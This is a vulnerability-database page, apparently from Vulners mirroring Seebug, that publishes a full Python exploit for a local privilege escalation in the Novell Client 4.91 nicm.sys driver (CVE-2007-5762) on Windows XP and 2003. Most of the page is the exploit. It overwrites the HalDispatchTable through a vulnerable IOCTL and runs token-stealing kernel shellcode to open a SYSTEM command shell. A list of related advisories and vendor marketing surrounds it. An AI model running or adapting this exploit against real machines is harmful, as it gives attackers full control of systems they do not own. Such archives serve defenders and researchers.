Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Novell Client 4.91 SP4 - Privilege Escalation Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 26 Views

Novell Client 4.91 SP3/4 Privilege Escalation Exploit for Win2K3 and WinX

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Novell Client 4.91 SP4 Privilege Escalation Exploit
22 May 201200:00
zdt
Circl		CVE-2007-5762
22 May 201200:00
circl
CVE		CVE-2007-5762
9 Jan 200822:00
cve
Cvelist		CVE-2007-5762
9 Jan 200822:00
cvelist
Exploit DB		Novell Client 4.91 SP4 - Local Privilege Escalation
22 May 201200:00
exploitdb
EUVD		EUVD-2007-5732
7 Oct 202500:30
euvd
exploitpack		Novell Client 4.91 SP4 - Local Privilege Escalation
22 May 201200:00
exploitpack
Tenable Nessus		Novell Client nicm.sys Local Privilege Escalation
10 Jan 200800:00
nessus
NVD		CVE-2007-5762
9 Jan 200822:46
nvd
Packet Storm		Novell Client 4.91 SP3/4 Privilege Escalation
23 May 201200:00
packetstorm
Rows per page

                                                # Novell Client 4.91 SP3/4 Privilege escalation exploit 
# Download link: http://download.novell.com/Download?buildid=SyZ1G2ti7wU~
#
# SecurityFocus: http://www.securityfocus.com/bid/27209/info
# CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5762
# Patch: http://download.novell.com/Download?buildid=4FmI89wOmg4~
# 
# Author: [email protected]
# Version Tested: Novell Client 4.91 SP4
# Targets: Exploit works on all service packs of Win2K3 and WinXP (except Windows XP SP1)
# Thanks: 
#		- g0tmi1k for helping me test out the exploit on as many versions of Windows as possible.
#		- ryujin for the help while developing the exploit.

from ctypes import *
import sys,struct,os
from optparse import OptionParser

kernel32 = windll.kernel32
ntdll    = windll.ntdll
Psapi    = windll.Psapi

def GetBase(drvname=None):
    EVIL_ARRAY            = 1024
    myarray               = c_ulong * EVIL_ARRAY 
    lpImageBase           = myarray() 
    cb                    = c_int(1024) 
    lpcbNeeded            = c_long() 
    drivername_size       = c_long() 
    drivername_size.value = 48
    Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded)) 
    for baseaddr in lpImageBase: 
        drivername = c_char_p("\x00"*drivername_size.value) 
        if baseaddr: 
            Psapi.GetDeviceDriverBaseNameA(baseaddr, drivername, 
                            drivername_size.value)
            if drvname:
                if drivername.value.lower() == drvname:
                    print "[>] Retrieving %s information." % drvname
                    print "[>] %s base address: %s" % (drvname, hex(baseaddr))
                    return baseaddr
            else:
                if drivername.value.lower().find("krnl") !=-1:
                    print "[>] Retrieving Kernel information."
                    print "[>] Kernel version: ", drivername.value
                    print "[>] Kernel base address: %s" % hex(baseaddr) 
                    return (baseaddr, drivername.value)
    return None

if __name__ == '__main__':

	usage =  "%prog -o <target>"
        parser = OptionParser(usage=usage)
        parser.add_option("-o", type="string",
                  action="store", dest="target_os",
                  help="Available target operating systems: XP, 2K3")
        (options, args) = parser.parse_args()
        OS = options.target_os
        if not OS or OS.upper() not in ['XP','2K3']:
           parser.print_help()
           sys.exit()
        OS = OS.upper()
	
	GENERIC_READ = 0x80000000
	GENERIC_WRITE = 0x40000000
	OPEN_EXISTING = 0x3
	DEVICE = '\\\\.\\nicm'
	
	device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
	
	(krnlbase, kernelver) = GetBase()
	hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
	HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable")
	HalDispatchTable -= hKernel
	HalDispatchTable += krnlbase
	HalBase = GetBase("hal.dll")
	print "[>] HalDispatchTable address:", hex(HalDispatchTable)
	HalDispatchTable0x4 = HalDispatchTable + 0x4
	HalDispatchTable0x8 = HalDispatchTable0x4 + 0x4
	HalDispatchTable_0x14 = HalDispatchTable0x4 - 0x10

	if OS == "2K3":
            HaliQuerySystemInformation = HalBase + 0x1fa1e # Offset for 2003
            HalpSetSystemInformation   = HalBase + 0x21c60 # Offset for 2003

        else:
            HaliQuerySystemInformation = HalBase + 0x16bba # Offset for XP
            HalpSetSystemInformation   = HalBase + 0x19436# Offset for XP
            
        print "[>] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation)
        print "[>] HalpSetSystemInformation address:", hex(HalpSetSystemInformation)
	
	EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL
	retn = c_ulong()
	inut_buffer = HalDispatchTable0x4 - 0x10 + 0x3 # Make the pwnsauce overwrite
	inut_size = 0x0
	output_buffer = 0x41414141 # Junk
	output_size = 0x0

        # Get offsets
        if OS == "2K3":
            _KPROCESS = "\x38" # Offset for 2003
            _TOKEN    = "\xd8" # Offset for 2003
            _UPID     = "\x94" # Offset for 2003
            _APLINKS  = "\x98" # Offset for 2003

        else:
            _KPROCESS = "\x44" # Offset for XP
            _TOKEN    = "\xc8" # Offset for XP
            _UPID     = "\x84" # Offset for XP
            _APLINKS  = "\x88" # Offset for XP

        # Restore the pointer
        pointer_restore =   "\x31\xc0" + \
                 "\xb8" + struct.pack("L", HalpSetSystemInformation) + \
                 "\xa3" + struct.pack("L", HalDispatchTable0x8) + \
                 "\xb8" + struct.pack("L", HaliQuerySystemInformation) + \
                 "\xa3" + struct.pack("L", HalDispatchTable0x4)

        # Make the evil token stealing
        steal_token =  "\x52"                                 +\
                 "\x53"                                 +\
                 "\x33\xc0"                             +\
                 "\x64\x8b\x80\x24\x01\x00\x00"         +\
                 "\x8b\x40" + _KPROCESS                 +\
                 "\x8b\xc8"                             +\
                 "\x8b\x98" + _TOKEN + "\x00\x00\x00"   +\
                 "\x89\x1d\x00\x09\x02\x00"             +\
                 "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
                 "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
                 "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
                 "\x75\xe8"                             +\
                 "\x8b\x90" + _TOKEN + "\x00\x00\x00"   +\
                 "\x8b\xc1"                             +\
                 "\x89\x90" + _TOKEN + "\x00\x00\x00"   +\
                 "\x5b"                                 +\
                 "\x5a"                                 +\
                 "\xc2\x10"

        # Build the shellcode
        sc = "\x90" * 100
        sc+= pointer_restore + steal_token
        sc+= "\x90" * 100
	
	if OS == "2K3":
		baseadd    = c_int(0x02a6ba10)
		
	else:
		baseadd    = c_int(0x026e7bb0)
		
	MEMRES     = (0x1000 | 0x2000)
	PAGEEXE    = 0x00000040
	Zero_Bits   = c_int(0)
	RegionSize = c_int(0x1000)
	write    = c_int(0)

	dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE)
	
	if OS == "2K3":
		kernel32.WriteProcessMemory(-1, 0x02a6ba10, sc, 0x1000, byref(write))
	
	else: 
		kernel32.WriteProcessMemory(-1, 0x026e7bb0, sc, 0x1000, byref(write))
		
	if device_handler:
		print "[>] Sending IOCTL to the driver."
		dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn), None) 
	
	evil_in  = c_ulong()
	evil_out  = c_ulong()
	evil_in  = 0x1337
	hola = ntdll.NtQueryIntervalProfile(evil_in, byref(evil_out))
	print "[>] Launching shell as SYSTEM."
	os.system("cmd.exe /K cd c:\\windows\\system32")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.00477
novell client 4.91privilege escalationwin2k3winxpexploitsecurityfocuscve-2007-5762patchkernelhaldispatchtable
26